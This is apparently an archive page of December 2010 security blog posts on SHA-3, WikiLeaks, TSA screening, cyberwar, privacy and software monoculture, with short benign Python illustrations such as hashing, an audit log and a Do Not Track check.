Yesterday, NIST announced the five hash functions to advance to the third (and final) round in the SHA-3 selection process: BLAKE, Grøstl, JH, Keccak, and Skein. Not really a surprise; my predictions—which I did not publish—listed ECHO instead of JH, but correctly identified the other four. (Most of the predictions I saw guessed BLAKE, Grøstl, Keccak, and Skein, but differed on the fifth.)

NIST will publish a report that explains its rationale for selecting the five it did.

Next is the Third SHA-3 Candidate Conference, which will probably be held in March 2012 in Washington, DC, in conjunction with FSE 2012. NIST will then pick a single algorithm to become SHA-3.

More information about Skein and the SHA-3 selection process, including lots of links, is here. Version 1.3 of the Skein paper, which discusses the new constant to defeat the Khovratovich-Nikolić-Rechberger attack, is here (description of the tweak here). And there’s this new analysis of Skein.
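
For readers who want to experiment: the candidates are all driven through the same hashlib-style update/digest interface, and Keccak, one of the five finalists named above, was ultimately standardized as SHA-3 and now ships in Python’s standard library as sha3_256 (Skein needs a third-party package). A quick sketch:

```python
# Exercising a SHA-3 finalist through Python's hashlib-style interface.
# (Keccak, one of the five finalists, was ultimately standardized as SHA-3;
# hashlib.sha3_256 is available in Python 3.6 and later.)
import hashlib

h = hashlib.sha3_256()
h.update(b"The quick brown fox ")
h.update(b"jumps over the lazy dog")   # incremental hashing of streamed data
print(h.hexdigest())

# One-shot form gives the same digest:
print(hashlib.sha3_256(b"The quick brown fox jumps over the lazy dog").hexdigest())
```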

And if you ordered a Skein polo shirt in September, they’ve been shipped.

Posted on December 10, 2010 at 12:04 PM · 31 Comments

Alternate Scanning Technologies

Iscon uses infrared light rather than X-rays. I have no idea how well it works.

And Rapiscan has a new patent:

Abstract:

The present invention is directed towards an X-ray people screening system capable of rapidly screening people for detection of metals, low Z materials (plastics, ceramics and illicit drugs) and other contraband which might be concealed beneath the person’s clothing or on the person’s body. In an exemplary embodiment, the scanning system has two scanning modules that are placed in parallel, yet opposing positions relative to each other. The two modules are spaced to allow a subject, such as a person, to stand and pass between the two scanning modules. The first module and second module each include a radiation source (such as X-ray radiation) and a detector array. The subject under inspection stands between the two modules such that a front side of the subject faces one module and the back side of the subject faces the other module.

Posted on December 10, 2010 at 6:22 AM · 39 Comments

WikiLeaks

I don’t have a lot to say about WikiLeaks, but I do want to make a few points.

1. Encryption isn’t the issue here. Of course the cables were encrypted, for transmission. Then they were received and decrypted, and—so it seems—put into an archive on SIPRNet, where lots of people had access to them in their unencrypted form.

2. Secrets are only as secure as the least trusted person who knows them. The more people who know a secret, the more likely it is to be made public.

3. I’m not surprised these cables were available to so many people. We know access control is hard, and it’s impossible to know beforehand what information people will need to do their jobs. What is surprising is that there weren’t any audit logs kept about who accessed all these cables. That seems like a no-brainer (a sketch of what such a log could look like follows this list).

4. This has little to do with WikiLeaks. WikiLeaks is just a website. The real story is that “least trusted person” who decided to violate his security clearance and make these cables public. In the 1970s, he would have mailed them to a newspaper. Today, he used WikiLeaks. Tomorrow, he will have his choice of a dozen similar websites. If WikiLeaks didn’t exist, he could have made them available via BitTorrent.

5. I think the government is learning what the music and movie industries were forced to learn years ago: it’s easy to copy and distribute digital files. That’s what’s different between the 1970s and today. Amassing and releasing that many documents was hard in the paper and photocopier era; it’s trivial in the Internet era. And just as the music and movie industries are going to have to change their business models for the Internet era, governments are going to have to change their secrecy models. I don’t know what those new models will be, but they will be different.
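
On point 3: tamper-evident access logging is cheap to build. Below is a minimal sketch of an append-only audit log in which each record’s MAC covers the previous record’s MAC, so deleting or altering an entry after the fact breaks the chain. Key management and durable storage are hand-waved, and the cable identifiers are invented.

```python
# Minimal tamper-evident access log: each entry's MAC covers the previous
# entry's MAC, so removing or editing a record breaks the chain.
# (Sketch only: key management, rotation, and durable storage are hand-waved.)
import hashlib
import hmac
import json
import time

KEY = b"audit-log-secret"   # in practice: kept off the system being audited

def append_entry(log: list[dict], user: str, document: str) -> None:
    prev_mac = log[-1]["mac"] if log else ""
    record = {"time": time.time(), "user": user, "doc": document}
    payload = json.dumps(record, sort_keys=True) + prev_mac
    record["mac"] = hmac.new(KEY, payload.encode(), hashlib.sha256).hexdigest()
    log.append(record)

def verify(log: list[dict]) -> bool:
    prev_mac = ""
    for record in log:
        body = {k: v for k, v in record.items() if k != "mac"}
        payload = json.dumps(body, sort_keys=True) + prev_mac
        expected = hmac.new(KEY, payload.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(record["mac"], expected):
            return False
        prev_mac = record["mac"]
    return True

log: list[dict] = []
append_entry(log, "analyst17", "cable-0001")   # invented identifiers
append_entry(log, "analyst17", "cable-0002")
assert verify(log)
log[0]["user"] = "someone-else"                # tampering...
assert not verify(log)                         # ...is detected
```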

EDITED TO ADD (12/10): Me in The Economist:

The State Department has learned what the music and film industries learned long ago: that digital files are easy to copy and distribute, says Bruce Schneier, a security expert. Companies are about to make that discovery, too. There will be more leaks, and they will be embarrassing.

Posted on December 9, 2010 at 5:50 AM · 115 Comments

Never Let the Terrorists Know How We're Storing Road Salt

This seems not to be a joke:

The American Civil Liberties Union has filed a lawsuit against the state after it refused to release the construction plans for a barn used to store road salt, on the basis that doing so would be a security risk.

[…]

Chiaffarano filed an OPRA request for the state’s building plans, but the state denied the request, citing a 2002 executive order by Gov. James McGreevey.

The order, issued in the wake of the Sept. 11 terrorist attacks on the World Trade Center and the Pentagon, allows the state to decline the release of public records that would compromise the state’s ability to “protect and defend the state and its citizens against acts of sabotage or terrorism.”

Lisa Ryan, spokeswoman for the Department of Community Affairs, declined to comment on the pending lawsuit.

Posted on December 8, 2010 at 2:27 PM · 67 Comments

Sane Comments on Terrorism

From Michael Leiter, the director of the National Counterterrorism Center:

Ultimately, Leiter said, it’ll be the “quiet, confident resilience” of Americans after a terrorist attack that will “illustrate ultimately the futility of terrorism.” That doesn’t mean not to hit back: Leiter quickly added that “we will hold those accountable [and] we will be ready to respond to those attacks.” But it does mean recognizing, he said, that “we help define the success of an attack by our reaction to that attack.”

Sure, I’ve been saying this since forever. But I think this is the most senior government person who has said this.

EDITED TO ADD (12/8): There are enough essays with this sentiment that I’m going to stop blogging about it. Here’s what I have saved up.

Roger Cohen, “The Real Threat to America”:

So I give thanks this week for the Fourth Amendment: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.”

I give thanks for Benjamin Franklin’s words after the 1787 Constitutional Convention describing the results of its deliberations: “A Republic, if you can keep it.”

To keep it, push back against enhanced patting, Chertoff’s naked-screening and the sinister drumbeat of fear.

Christopher Hitchens, “Don’t Be an Ass About Airport Security.”

Tom Engelhardt, “The National Security State Cops a Feel.”

Evan DeFilippis, “A Nude Awakening—TSA and Privacy”:

If we have both the right to privacy and the right to travel, then TSA’s newest procedures cannot conceivably be considered legal. The TSA’s regulations blatantly compromise the former at the expense of the latter, and as time goes on we will soon forget what it meant to have those rights.

EDITED TO ADD (12/8): Also, this great comic.

Posted on December 8, 2010 at 7:10 AM · 37 Comments

Profiling Lone Terrorists

Master’s thesis from the Naval Postgraduate School: “Patterns of Radicalization: Identifying the Markers and Warning Signs of Domestic Lone Wolf Terrorists in Our Midst.”

Abstract:

This thesis will scrutinize the histories of our nation’s three most prolific domestic lone wolf terrorists: Tim McVeigh, Ted Kaczynski, and Eric Rudolph. It will establish a chronological pattern to their radicalization and reveal that their communal ideological beliefs, psychology, attributes, traits, and training take place along a common chronological timeline. Their pattern of radicalization can be used as an indicator of lone wolf terrorist radicalization development in future cases. This thesis establishes a strikingly similar chronological pattern of radicalization that was present in each terrorist’s biography. This pattern can identify future lone wolf terrorist radicalization activity upstream. It can provide a valuable portent to apply in the analysis of potential lone terrorists, potentially enabling law enforcement to prevent tragedies emerging from the identified population through psychological assistance, evaluation, training, or, in the worst case, detention.

Paper.

Posted on December 7, 2010 at 6:43 AM · 72 Comments

FTC Privacy Report

The U.S. Federal Trade Commission released its privacy report: “Protecting Consumer Privacy in an Era of Rapid Change.”

From the press release:

One method of simplified choice the FTC staff recommends is a “Do Not Track” mechanism governing the collection of information about consumers’ Internet activity to deliver targeted advertisements and for other purposes. Consumers and industry both support increased transparency and choice for this largely invisible practice. The Commission recommends a simple, easy-to-use choice mechanism for consumers to opt out of the collection of information about their Internet behavior for targeted ads. The most practical method would probably involve the placement of a persistent setting, similar to a cookie, on the consumer’s browser signaling the consumer’s choices about being tracked and receiving targeted ads.
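
The “persistent setting, similar to a cookie” was later realized as the Do Not Track HTTP header, which participating browsers send as DNT: 1. Here is a minimal sketch of a server honoring that signal; the record_for_ads function is a hypothetical stand-in for a real tracking pipeline.

```python
# Minimal sketch of a server honoring a Do Not Track signal.
# Browsers that implemented the idea send the header "DNT: 1";
# record_for_ads() is a hypothetical stand-in for a tracking pipeline.
from http.server import BaseHTTPRequestHandler, HTTPServer

def record_for_ads(path: str) -> None:
    print(f"tracking visit to {path}")   # placeholder for real tracking

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.headers.get("DNT") != "1":   # only track absent an opt-out
            record_for_ads(self.path)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"hello\n")

if __name__ == "__main__":
    HTTPServer(("localhost", 8000), Handler).serve_forever()
```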

News story.

Posted on December 6, 2010 at 1:52 PM · 30 Comments

Cyberwar and the Future of Cyber Conflict

The world is gearing up for cyberwar. The U.S. Cyber Command became operational in November. NATO has enshrined cyber security among its new strategic priorities. The head of Britain’s armed forces said recently that boosting cyber capability is now a huge priority for the UK. And we know China is already engaged in broad cyber espionage attacks against the west. So how can we control a burgeoning cyber arms race?

We may already have seen early versions of cyberwars in Estonia and Georgia, possibly perpetrated by Russia. It’s hard to know for certain, not only because such attacks are often impossible to trace, but because we have no clear definitions of what a cyberwar actually is.

Do the 2007 attacks against Estonia, traced to a young Russian man living in Tallinn and no one else, count? What about a virus from an unknown origin, possibly targeted at an Iranian nuclear complex? Or espionage from within China, but not specifically directed by its government? To such questions one must add even more basic issues, like when a cyberwar is understood to have begun, and how it ends. When even cyber security experts can’t answer these questions, it’s hard to expect much from policymakers.

We can set parameters. It is obviously not an act of war just to develop digital weapons targeting another country. Using cyber attacks to spy on another nation is a grey area, which gets greyer still when a country penetrates information networks, just to see if it can do so. Penetrating such networks and leaving a back door open, or even leaving logic bombs behind to be used later, is a harder case—yet the US and China are doing this to each other right now.

And what about when one country deliberately damages the economy of another, as one of the WikiLeaks cables shows that a member of China’s politburo did against Google in January 2010? Definitions and rules are hard not just because the tools of war have changed, but because cyberspace puts them into the hands of a broader group of people. Previously only the military had weapons. Now anyone with sufficient computer skills can take matters into their own hands.

There are more basic problems too. When a nation is attacked in a regular conflict, a variety of military and civil institutions respond. The legal framework for this depends on two things: the attacker and the motive. But when you’re attacked on the internet, those are precisely the two things you don’t know. We don’t know if Georgia was attacked by the Russian government, or just some hackers living in Russia. In spite of much speculation, we don’t know the origin, or target, of Stuxnet. We don’t even know if last July 4’s attacks against US and South Korean computers originated in North Korea, China, England, or Florida.

When you don’t know, it’s easy to get it wrong, and to retaliate against the wrong target or for the wrong reason. That means it is easy for things to get out of hand. So while it is legitimate for nations to build offensive and defensive cyberwar capabilities, we also need to think now about what can be done to limit the risk of cyberwar.

A first step would be a hotline between the world’s cyber commands, modelled after similar hotlines among nuclear commands. This would at least allow governments to talk to each other, rather than guess where an attack came from. More difficult, but more important, are new cyberwar treaties. These could stipulate a no first use policy, outlaw unaimed weapons, or mandate weapons that self-destruct at the end of hostilities. The Geneva Conventions need to be updated too.

Cyber weapons beg to be used, so limits on stockpiles, and restrictions on tactics, are a logical end point. International banking, for instance, could be declared off-limits. Whatever the specifics, such agreements are badly needed. Enforcement will be difficult, but that’s not a reason not to try. It’s not too late to reverse the cyber arms race currently under way. Otherwise, it is only a matter of time before something big happens: perhaps by the rash actions of a low level military officer, perhaps by a non-state actor, perhaps by accident. And if the target nation retaliates, we could actually find ourselves in a cyberwar.

This essay was originally published in the Financial Times (free registration required for access, or search on Google News).

Posted on December 6, 2010 at 6:42 AM · 70 Comments

Football Match Fixing

Detecting fixed football (soccer) games.

There is a certain buzz of expectation, because Oscar, one of the fraud analysts, has spotted a game he is sure has been fixed.

“We’ve been watching this for a couple of weeks now,” he says.

“The odds have gone to a very suspicious level. We believe that this game will finish in an away victory. Usually an away team would have around a 30% chance of winning, but at the current odds this team is about 85% likely to win.”

[…]

Often news of the fix will leak so that gamblers jump on the bandwagon. The game we are watching falls, it seems, into the second category.

Oscar monitors the betting at half-time. He is especially interested in money being laid not on the result itself, but on the number of goals that are going to be scored.

“The most likely score lines are 2-1 or 3-1,” he announces.
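
The arithmetic behind Oscar’s red flag is simple: a decimal betting price of x implies a win probability of roughly 1/x, ignoring the bookmaker’s margin, so a market that drifts far above the historical baseline stands out. A sketch with invented numbers matching the article’s 30% and 85% figures:

```python
# Implied win probability from decimal odds, ignoring bookmaker margin.
# All numbers are invented, chosen to match the article's ~30% -> ~85%.

def implied_probability(decimal_odds: float) -> float:
    return 1.0 / decimal_odds

def suspicious(current_odds: float, baseline_prob: float,
               threshold: float = 0.25) -> bool:
    """Flag a market whose implied probability has drifted far above the
    historical baseline for comparable fixtures."""
    return implied_probability(current_odds) - baseline_prob > threshold

baseline_away_win = 0.30    # typical away-win chance
current_away_odds = 1.18    # a price of 1.18 implies about an 85% chance

print(f"implied: {implied_probability(current_away_odds):.0%}")
print("suspicious!" if suspicious(current_away_odds, baseline_away_win) else "ok")
```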

This is interesting:

Oscar is also interested in the activity of a club manager – but his modus operandi is somewhat different. He does not throw games. He wins them.

[…]

“The reason he’s so important is because he has relationships with all his previous clubs. He has managed at least three or four of the teams he is now buying wins against. He has also managed a lot of players from the opposition, who are being told to lose these matches.”

I always think of fixing a game as meaning losing it on purpose, not winning it by paying the other team to lose.

Posted on December 3, 2010 at 12:41 PM · 13 Comments

Full Body Scanners: What's Next?

Organizers of National Opt Out Day—the Wednesday before Thanksgiving, when air travelers were urged to opt out of the full-body scanners at security checkpoints and instead submit to full-body patdowns—were outfoxed by the TSA. The government pre-empted the protest by turning off the machines in most airports during the Thanksgiving weekend. Everyone went through the metal detectors, just as before.

Now that Thanksgiving is over, the machines are back on and the "enhanced" pat-downs have resumed. I suspect that more people would prefer to have naked images of themselves seen by TSA agents in another room than to be intimately touched by a TSA agent right in front of them.

But now, the TSA is in a bind. Regardless of whatever lobbying came before, or whatever financial interest former DHS officials have in these scanners, the TSA has spent billions on those scanners, claiming they’re essential. But because people can opt out, the alternate manual method must be equally effective; otherwise, the terrorists could just opt out. Making the pat-downs less invasive would be the same as admitting the scanners aren’t essential. Senior officials would get fired over that.

So not counting inconsequential modifications to demonstrate they’re "listening," the pat-downs will continue. And they’ll continue for everyone: children, abuse survivors, rape survivors, urostomy bag wearers, people in wheelchairs. It has to be that way; otherwise, the terrorists could simply adapt. They’d hide their explosives on their children or in their urostomy bags. They’d recruit rape survivors, abuse survivors, or seniors. They’d dress as pilots. They’d sneak their PETN through airport security using the very type of person who isn’t being screened.

And PETN is what the TSA is looking for these days. That’s pentaerythritol tetranitrate, the plastic explosive that both the Shoe Bomber and the Underwear Bomber attempted but failed to detonate. It’s what was mailed from Yemen. It’s in Iraq and Afghanistan. Guns and traditional bombs are passé; PETN is the terrorist tool of the future.

The problem is that no scanners or puffers can detect PETN; only swabs and dogs work. What the TSA hopes is that they will detect the bulge if someone is hiding a wad of it on their person. But they won’t catch PETN hidden in a body cavity. That doesn’t have to be as gross as you’re imagining; you can hide PETN in your mouth. A terrorist can go through the scanners a dozen times with bits in his mouth each time, and assemble a bigger bomb on the other side. Or he can roll it thin enough to be part of a garment, and sneak it through that way. These tricks aren’t new. In the days after the Underwear Bomber was stopped, a scanner manufacturer admitted that the machines might not have caught him.

So what’s next? Strip searches? Body cavity searches? TSA Administrator John Pistole said there would be no body cavity searches for now, but his reasons make no sense. He said that the case widely reported as being a body cavity bomb might not actually have been. While that appears to be true, what does that have to do with future bombs? He also said that even body cavity bombs would need "external initiators" that the TSA would be able to detect.

Do you think for a minute that the TSA can detect these "external initiators"? Do you think that if a terrorist took a laptop—or better yet, a less-common piece of electronics gear—and removed the insides and replaced them with a timer, a pressure sensor, a simple contact switch, or a radio frequency switch, the TSA guy behind the X-ray machine monitor would detect it? How about if those components were distributed over a few trips through airport security? On the other hand, if we believe the TSA can magically detect these "external initiators" so effectively that they make body-cavity searches unnecessary, why do we need the full-body scanners?

Either PETN is a danger that must be searched for, or it isn’t. Pistole was being either ignorant or evasive.

Once again, the TSA is covering their own asses by implementing security-theater measures to prevent the previous attack while ignoring any threats of future attacks. It’s the same thinking that caused them to ban box cutters after 9/11, screen shoes after Richard Reid, limit liquids after that London gang, and—I kid you not—ban printer cartridges over 16 ounces after they were used to house package bombs from Yemen. They act like the terrorists are incapable of thinking creatively, while the terrorists repeatedly demonstrate that they can always come up with a new approach that circumvents the old measures.

On the plus side, PETN is very hard to get to explode. The pre-9/11 screening procedures, looking for obvious guns and bombs, forced the terrorists to build inefficient fusing mechanisms. We saw this when Abdulmutallab, the Underwear Bomber, used bottles of liquid and a syringe and 20 minutes in the bathroom to assemble his device, then set his pants on fire—and still failed to ignite his PETN-filled underwear. And when he failed, the passengers quickly subdued him.

The truth is that exactly two things have made air travel safer since 9/11: reinforcing cockpit doors and convincing passengers they need to fight back. The TSA should continue to screen checked luggage. They should start screening airport workers. And then they should return airport security to pre-9/11 levels and let the rest of their budget be used for better purposes. Investigation and intelligence are how we’re going to prevent terrorism, on airplanes and elsewhere. It’s how we caught the liquid bombers. It’s how we found the Yemeni printer-cartridge bombs. And it’s our best chance at stopping the next serious plot.

Because if a group of well-prepared and well-funded terrorist plotters makes it to the airport, the chance is pretty low that those blue-shirted crotch-groping water-bottle-confiscating TSA agents are going to catch them. The agents are trying to do a good job, but the deck is so stacked against them that their job is impossible. Airport security is the last line of defense, and it’s not a very good one.

We have a job here, too, and it’s to be indomitable in the face of terrorism. The goal of terrorism is to terrorize us: to make us afraid, and make our government do exactly what the TSA is doing. When we react out of fear, the terrorists succeed even when their plots fail. But if we carry on as before, the terrorists fail—even when their plots succeed.

This essay originally appeared on The Atlantic website.

Posted on December 3, 2010 at 6:20 AM131 Comments

Close the Washington Monument

Securing the Washington Monument from terrorism has turned out to be a surprisingly difficult job. The concrete fence around the building protects it from attacking vehicles, but there’s no visually appealing way to house the airport-level security mechanisms the National Park Service has decided are a must for visitors. It is considering several options, but I think we should close the monument entirely. Let it stand, empty and inaccessible, as a monument to our fears.

An empty Washington Monument would serve as a constant reminder to those on Capitol Hill that they are afraid of the terrorists and what they could do. They’re afraid that by speaking honestly about the impossibility of attaining absolute security or the inevitability of terrorism—or that some American ideals are worth maintaining even in the face of adversity—they will be branded as “soft on terror.” And they’re afraid that Americans would vote them out of office if another attack occurred. Perhaps they’re right, but what has happened to leaders who aren’t afraid? What has happened to “the only thing we have to fear is fear itself”?

An empty Washington Monument would symbolize our lawmakers’ inability to take that kind of stand—and their inability to truly lead.

Some of them call terrorism an “existential threat” against our nation. It’s not. Even the events of 9/11, as horrific as they were, didn’t make an existential dent in our nation. Automobile-related fatalities—at 42,000 per year, more deaths each month, on average, than 9/11—aren’t, either. It’s our reaction to terrorism that threatens our nation, not terrorism itself. The empty monument would symbolize the empty rhetoric of those leaders who preach fear and then use that fear for their own political ends.

The day after Umar Farouk Abdulmutallab failed to blow up a Northwest jet with a bomb hidden in his underwear, Homeland Security Secretary Janet Napolitano said “The system worked.” I agreed. Plane lands safely, terrorist in custody, nobody injured except the terrorist. Seems like a working system to me. The empty monument would represent the politicians and press who pilloried her for her comment, and Napolitano herself, for backing down.

The empty monument would symbolize our war on the unexpected—our overreaction to anything different or unusual—our harassment of photographers, and our probing of airline passengers. It would symbolize our “show me your papers” society, rife with ID checks and security cameras. As long as we’re willing to sacrifice essential liberties for a little temporary safety, we should keep the Washington Monument empty.

Terrorism isn’t a crime against people or property. It’s a crime against our minds, using the death of innocents and destruction of property to make us fearful. Terrorists use the media to magnify their actions and further spread fear. And when we react out of fear, when we change our policy to make our country less open, the terrorists succeed—even if their attacks fail. But when we refuse to be terrorized, when we’re indomitable in the face of terror, the terrorists fail—even if their attacks succeed.

We can reopen the monument when every foiled or failed terrorist plot causes us to praise our security, instead of redoubling it. When the occasional terrorist attack succeeds, as it inevitably will, we accept it, as we accept the murder rate and automobile-related death rate, and redouble our efforts to remain a free and open society.

The grand reopening of the Washington Monument will not occur when we’ve won the war on terror, because that will never happen. It won’t even occur when we’ve defeated al Qaeda. Militant Islamic terrorism has fractured into small, elusive groups. We can reopen the Washington Monument when we’ve defeated our fears, when we’ve come to accept that placing safety above all other virtues cedes too much power to government and that liberty is worth the risks, and that the price of freedom is accepting the possibility of crime.

I would proudly climb to the top of a monument to those ideals.

A version of this essay—there were a lot of changes and edits—originally appeared in the New York Daily News.

I wish I’d come up with the idea of closing the Washington Monument, but I didn’t. It was the idea of the Washington Post’s Philip Kennicott, although he didn’t say it with as much fervor.

Posted on December 2, 2010 at 10:41 AM129 Comments

Brian Snow Sows Cyber Fears

That’s no less sensational a headline than the Calgary Herald’s: “Total cyber-meltdown almost inevitable, expert tells Calgary audience.” The expert in question is former NSA Technical Director Brian Snow, speaking to a university audience.

“It’s long weeks to short months at best before there’s a security meltdown,” said Snow, as a guest lecturer for the Institute for Security, Privacy and Information Assurance, an interdisciplinary group at the university dedicated to information security.

“Will a bank failure be the wake-up call before we act? It’s a global problem—not just the U.S., not just Canada, but the world.”

I know Brian, and I have to believe his definition of “security meltdown” is more limited than the headline leads one to believe.

Posted on December 2, 2010 at 7:06 AM31 Comments

Risk Reduction Strategies on Social Networking Sites

By two teenagers:

Mikalah uses Facebook but when she goes to log out, she deactivates her Facebook account. She knows that this doesn’t delete the account; that’s the point. She knows that when she logs back in, she’ll be able to reactivate the account and have all of her friend connections back. But when she’s not logged in, no one can post messages on her wall or send her messages privately or browse her content. But when she’s logged in, they can do all of that. And she can delete anything that she doesn’t like. Michael Ducker calls this practice “super-logoff” when he noticed a group of gay male adults doing the exact same thing.

And:

Shamika doesn’t deactivate her Facebook profile but she does delete every wall message, status update, and Like shortly after it’s posted. She’ll post a status update and leave it there until she’s ready to post the next one or until she’s done with it. Then she’ll delete it from her profile. When she’s done reading a friend’s comment on her page, she’ll delete it. She’ll leave a Like up for a few days for her friends to see and then delete it.

I’ve heard this practice called wall scrubbing.

In any reasonably competitive market economy, sites would offer these as options to better serve their customers. But in the give-it-away user-as-product economy we so often have on the Internet, the social networking sites have a different agenda.
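
A feature like this wouldn't even be hard to build; it's just a retention policy. Here is a minimal sketch, assuming a hypothetical client API (no real social network exposes exactly these calls, and the retention windows below are invented to mirror Shamika's habits):

# A sketch of "wall scrubbing" offered as a feature: a per-item-type
# retention policy. HypotheticalSocialClient and its methods are
# invented for illustration; no real site exposes exactly this API.

from datetime import datetime, timedelta, timezone

RETENTION = {
    "status": timedelta(days=1),     # keep a status until the next one
    "comment": timedelta(hours=12),  # delete comments once read
    "like": timedelta(days=3),       # leave Likes up a few days
}

def scrub_wall(client, now=None):
    # Delete every wall item that has outlived its retention window.
    now = now or datetime.now(timezone.utc)
    for item in client.list_wall_items():       # hypothetical call
        max_age = RETENTION.get(item.kind)
        if max_age is not None and now - item.created_at > max_age:
            client.delete_item(item.item_id)    # hypothetical call

# Running this on every logout would automate the practice:
# scrub_wall(HypotheticalSocialClient(user="shamika"))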

Posted on December 1, 2010 at 1:27 PM51 Comments

Software Monoculture

In 2003, a group of security experts—myself included—published a paper saying that 1) software monocultures are dangerous and 2) Microsoft, being the largest creator of monocultures out there, is the most dangerous. Marcus Ranum responded with an essay that basically said we were full of it. Now, seven years later, Marcus and I thought it would be interesting to revisit the debate.

The basic problem with a monoculture is that it’s all vulnerable to the same attack. The Irish Potato Famine of 1845–9 is perhaps the most famous monoculture-related disaster. The Irish planted only one variety of potato, and the genetically identical potatoes succumbed to a rot caused by Phytophthora infestans. Compare that with the diversity of potatoes traditionally grown in South America, each one adapted to the particular soil and climate of its home, and you can see the security value in heterogeneity.

Similar risks exist in networked computer systems. If everyone is using the same operating system or the same applications software or the same networking protocol, and a security vulnerability is discovered in that OS or software or protocol, a single exploit can affect everyone. This is the problem of large-scale Internet worms: many have affected millions of computers on the Internet.

If our networking environment weren’t homogeneous, a single worm couldn’t do so much damage. We’d be more like South America’s potato crop than Ireland’s. Conclusion: monoculture is bad; embrace diversity or die along with everyone else.

This analysis makes sense as far as it goes, but suffers from three basic flaws. The first is the assumption that our IT monoculture is as simple as the potato’s. When the particularly virulent Storm worm hit, it affected only 1 to 10 million of its billion-plus possible victims. Why? Because some computers were running updated antivirus software, or were within locked-down networks, or whatever. Two computers might be running the same OS or applications software, but they’ll be inside different networks with different firewalls and IDSs and router policies, they’ll have different antivirus programs and different patch levels and different configurations, and they’ll be in different parts of the Internet connected to different servers running different services. As Marcus pointed out back in 2003, they’ll be a little bit different themselves. That’s one of the reasons large-scale Internet worms don’t infect everyone—as well as the network’s ability to quickly develop and deploy patches, new antivirus signatures, new IPS signatures, and so on.

The second flaw in the monoculture analysis is that it downplays the cost of diversity. Sure, it would be great if a corporate IT department ran half Windows and half Linux, or half Apache and half Microsoft IIS, but doing so would require more expertise and cost more money. It wouldn’t cost twice the expertise and money—there is some overlap—but there are significant economies of scale that result from everyone using the same software and configuration. A single operating system locked down by experts is far more secure than two operating systems configured by sysadmins who aren’t so expert. Sometimes, as Mark Twain said: “Put all your eggs in one basket, and then guard that basket!”

The third flaw is that you can only get a limited amount of diversity by using two operating systems, or routers from three vendors. South American potato diversity comes from hundreds of different varieties. Genetic diversity comes from millions of different genomes. In monoculture terms, two is little better than one. Even worse, since a network’s security is primarily the minimum of the security of its components, a diverse network is less secure because it is vulnerable to attacks against any of its heterogeneous components.
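
The weakest-link arithmetic is easy to check with made-up numbers: if a successful exploit against any one component compromises the network, adding a second, less-hardened platform increases the overall breach probability rather than reducing it. A minimal sketch, with illustrative probabilities of my own invention:

# Made-up numbers illustrating why a network's security tends toward
# the minimum of its components': if compromising any one component
# compromises the network, diversity adds attack surface.

def breach_probability(per_component):
    # P(at least one component falls) = 1 - product of survival odds.
    survive = 1.0
    for p in per_component:
        survive *= 1.0 - p
    return 1.0 - survive

expert_monoculture = [0.05]        # one OS, locked down by experts
diverse_but_weaker = [0.05, 0.10]  # add a second, less-hardened OS

print(breach_probability(expert_monoculture))  # 0.05
print(breach_probability(diverse_but_weaker))  # 0.145 -- worse, not better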

Some monoculture is necessary in computer networks. As long as we have to talk to each other, we’re all going to have to use TCP/IP, HTML, PDF, and all sorts of other standards and protocols that guarantee interoperability. Yes, there will be different implementations of the same protocol—and this is a good thing—but that won’t protect you completely. You can’t be too different from everyone else on the Internet, because if you were, you couldn’t be on the Internet.

Species basically have two options for propagating their genes: the lobster strategy and the avian strategy. Lobsters lay 5,000 to 40,000 eggs at a time, and essentially ignore them. Only a minuscule percentage of the hatchlings live to be four weeks old, but that’s sufficient to ensure gene propagation; from every 50,000 eggs, an average of two lobsters is expected to survive to legal size. Conversely, birds produce only a few eggs at a time, then spend a lot of effort ensuring that most of the hatchlings survive. In ecology, this is known as r/K selection theory. In either case, each of those offspring varies slightly genetically, so if a new threat arises, some of them will be more likely to survive. But even so, extinctions happen regularly on our planet; neither strategy is foolproof.

Our IT infrastructure is a lot more like a bird than a lobster. Yes, monoculture is dangerous and diversity is important. But investing time and effort in ensuring our current infrastructure’s survival is even more important.

This essay was originally published in Information Security, and is the first half of a point/counterpoint with Marcus Ranum. You can read his response there as well.

EDITED TO ADD (12/13): Commentary.

Posted on December 1, 2010 at 5:55 AM57 Comments
